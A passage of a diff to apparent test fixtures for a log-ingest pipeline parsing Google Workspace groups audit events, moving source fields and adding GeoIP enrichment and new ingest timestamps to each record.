"approve_join_request", @@ -231,24 +264,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -279,8 +303,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286042300Z", + "ingested": "2021-12-14T14:45:12.889092672Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "join", @@ -305,24 +350,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -353,8 +389,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286046800Z", + "ingested": "2021-12-14T14:45:12.889093060Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "request_to_join", @@ -379,24 +436,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -430,8 +478,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286052100Z", + "ingested": "2021-12-14T14:45:12.889093449Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}", "provider": "groups", "action": "change_basic_setting", @@ -456,24 +525,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -504,8 +564,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286057300Z", + "ingested": "2021-12-14T14:45:12.889093839Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "create_group", @@ -529,24 +610,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -577,8 +649,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286062500Z", + "ingested": "2021-12-14T14:45:12.889094238Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "delete_group", @@ -602,24 +695,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -653,8 +737,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286067700Z", + "ingested": "2021-12-14T14:45:12.889094623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}", "provider": "groups", "action": "change_identity_setting", @@ -679,24 +784,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -729,8 +825,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286072900Z", + "ingested": "2021-12-14T14:45:12.889095008Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "add_info_setting", @@ -755,24 +872,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -806,8 +914,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286078200Z", + "ingested": "2021-12-14T14:45:12.889095395Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}", "provider": "groups", "action": "change_info_setting", @@ -832,24 +961,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -882,8 +1002,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286083700Z", + "ingested": "2021-12-14T14:45:12.889095982Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "remove_info_setting", @@ -908,24 +1049,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -959,8 +1091,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286088900Z", + "ingested": "2021-12-14T14:45:12.889096392Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}", "provider": "groups", "action": "change_new_members_restrictions_setting", @@ -985,24 +1138,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1036,8 +1180,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286094100Z", + "ingested": "2021-12-14T14:45:12.889096776Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}", "provider": "groups", "action": "change_post_replies_setting", @@ -1062,24 +1227,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1113,8 +1269,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286099400Z", + "ingested": "2021-12-14T14:45:12.889097164Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}", "provider": "groups", "action": "change_spam_moderation_setting", @@ -1139,24 +1316,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1182,16 +1350,37 @@ "event": { "type": "moderator_action" }, - "kind": "admin#reports#activity", - "organization": { - "domain": "elastic.com" - } - }, - "organization": { - "id": "1" + "kind": "admin#reports#activity", + "organization": { + "domain": "elastic.com" + } + }, + "organization": { + "id": "1" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:12.286104600Z", + "ingested": "2021-12-14T14:45:12.889097549Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", "provider": "groups", "action": "change_topic_setting", @@ -1216,24 +1405,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1269,8 +1449,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286109900Z", + "ingested": "2021-12-14T14:45:12.889098064Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", "provider": "groups", "action": "moderate_message", @@ -1294,24 +1495,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1347,8 +1539,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286115200Z", + "ingested": "2021-12-14T14:45:12.889098456Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", "provider": "groups", "action": "always_post_from_user", @@ -1375,24 +1588,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1428,8 +1632,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286120500Z", + "ingested": "2021-12-14T14:45:12.889098867Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "add_user", @@ -1457,24 +1682,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1510,8 +1726,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286125700Z", + "ingested": "2021-12-14T14:45:12.889099261Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "ban_user_with_moderation", @@ -1539,24 +1776,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1591,8 +1819,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286130900Z", + "ingested": "2021-12-14T14:45:12.889099668Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "revoke_invitation", @@ -1620,24 +1869,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1672,8 +1912,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286136200Z", + "ingested": "2021-12-14T14:45:12.889100053Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "invite_user", @@ -1701,24 +1962,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1753,8 +2005,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + 